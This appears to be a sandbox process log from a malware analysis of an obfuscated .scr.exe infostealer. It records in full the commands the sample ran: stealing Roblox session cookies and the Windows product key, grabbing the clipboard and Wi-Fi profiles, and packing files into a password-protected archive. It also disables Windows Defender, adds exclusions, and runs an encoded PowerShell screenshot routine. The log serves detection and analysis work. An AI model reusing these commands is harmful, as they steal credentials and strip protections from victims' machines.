Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Section loaded: libffi-8.dll	Jump to behavior
